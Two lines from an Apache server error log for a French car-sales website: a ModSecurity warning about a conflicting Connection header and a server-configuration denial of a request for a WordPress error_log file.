[Mon May 11 19:06:57.707306 2026] [security2:error] [pid 1501831:tid 1501857] [client 43.134.165.242:55448] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ventes-privees-auto.fr"] [uri "/"] [unique_id "agIMsVNddpkriGUb6ZVPPQAAARg"]
[Mon May 11 19:07:38.675767 2026] [authz_core:error] [pid 1502013:tid 1502046] [client 47.128.126.119:49146] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/rest-api/error_log